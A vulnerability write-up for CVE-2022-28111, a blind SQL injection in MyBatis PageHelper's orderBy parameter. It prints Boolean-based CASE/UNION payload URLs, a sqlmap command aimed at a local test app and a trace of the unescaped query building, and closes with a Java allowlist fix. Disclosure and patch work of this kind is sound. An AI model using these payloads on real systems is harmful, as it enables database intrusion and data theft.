CVE-2022-28111: Pagehelper has a SQL injection vulnerability validation process - 睡不醒,好烦啊

MyBatis PageHelper v1.x.x-v5.x.x was discovered to contain a time-blind SQL injection vulnerability via the orderBy parameter.

CVE
#sql#vulnerability#web#git#java#maven

Pagehelper has a SQL injection vulnerability validation process

Note: Boolean-based blind and time-based blind SQL injection vulnerabilities exist in the orderBy parameter of PageHelper.

Official website: https://pagehelper.github.io/

Source code: https://github.com/pagehelper/Mybatis-PageHelper

Git: https://github.com/pagehelper/Mybatis-PageHelper.git

Verification process:

  1.  Local environment: Spring Boot + MyBatis + Maven + MySQL
  2.  Visit a page that accepts the sort parameter orderBy.
  3.  Visit the URL with a true condition, (1=1): http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) . The CASE yields 'costprice' and the page is returned normally.
  4.  Visit the same URL with a false condition, (1=2): http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) . The ELSE branch is a subquery returning two rows, so MySQL raises an error; the difference in response confirms the Boolean-based blind injection.
  5.  Scan using sqlmap, command: python3 sqlmap.py -u "http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=costprice\*" --batch --dbms=mysql

View the source code:

  1.  In the converToOrderBySql function of com/github/pagehelper/parser/OrderByParser.java, the mapper's SQL statement is concatenated with pageNum, pageSize, and orderBy.
  2.  The function concatenates the mapper SQL statement \[select \* from book\] directly with the value submitted in the orderBy parameter \[(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))\], with no validation or escaping.
  3.  The value returned by converToOrderBySql is assigned to sql: sql = SELECT \* FROM book order by (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
  4.  getPageSql then appends the LIMIT clause to sql to build the final query statement.
  5.  Enabling MySQL's general query log shows the executed statements; the value submitted in the orderBy parameter appears verbatim in the executed query \[ SELECT \* FROM book order by (SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) LIMIT 10 \]
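Because PageHelper concatenates whatever orderBy string it is given, the application must never pass user input through unchanged. The following is an added example (not PageHelper's code and not from the write-up above) of resolving the user's sort request against an allowlist and passing only the resolved string as the orderBy argument of PageHelper.startPage(pageNum, pageSize, orderBy). The sort keys, the book table columns and the class name are assumptions for illustration.

```java
import java.util.Map;
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Added example: map a user-facing sort key to an allowlisted column before
 * the string is handed to PageHelper.startPage(pageNum, pageSize, orderBy).
 * PageHelper concatenates that string into the SQL, so only values produced
 * here may ever reach it.
 */
public final class SafeOrderBy {

    // Hypothetical API sort keys -> real column names of the book table (assumed).
    private static final Map<String, String> SORT_COLUMNS = Map.of(
            "price", "costprice",
            "title", "title",
            "id", "id");

    private static final Set<String> DIRECTIONS = Set.of("ASC", "DESC");

    // Defence in depth: even a resolved column must be a bare SQL identifier.
    private static final Pattern IDENTIFIER = Pattern.compile("^[A-Za-z_][A-Za-z0-9_]*$");

    private SafeOrderBy() {}

    /** Returns a fragment such as "costprice DESC", or throws for anything outside the allowlist. */
    public static String resolve(String sortKey, String direction) {
        String column = SORT_COLUMNS.get(sortKey == null ? "" : sortKey.trim());
        if (column == null || !IDENTIFIER.matcher(column).matches()) {
            throw new IllegalArgumentException("unsupported sort key");
        }
        String dir = direction == null ? "ASC" : direction.trim().toUpperCase();
        if (!DIRECTIONS.contains(dir)) {
            throw new IllegalArgumentException("unsupported sort direction");
        }
        return column + " " + dir;
    }

    public static void main(String[] args) {
        // Accepted: resolves to the real column and is safe to pass to startPage().
        System.out.println(resolve("price", "desc"));

        // Rejected: the CASE/UNION payload from the write-up is not a known sort
        // key, so it is refused before any SQL string is built.
        try {
            resolve("(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))", "asc");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

In the controller, call PageHelper.startPage(pageNum, pageSize, SafeOrderBy.resolve(sort, dir)) so that the raw request parameter is never used as the orderBy value.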
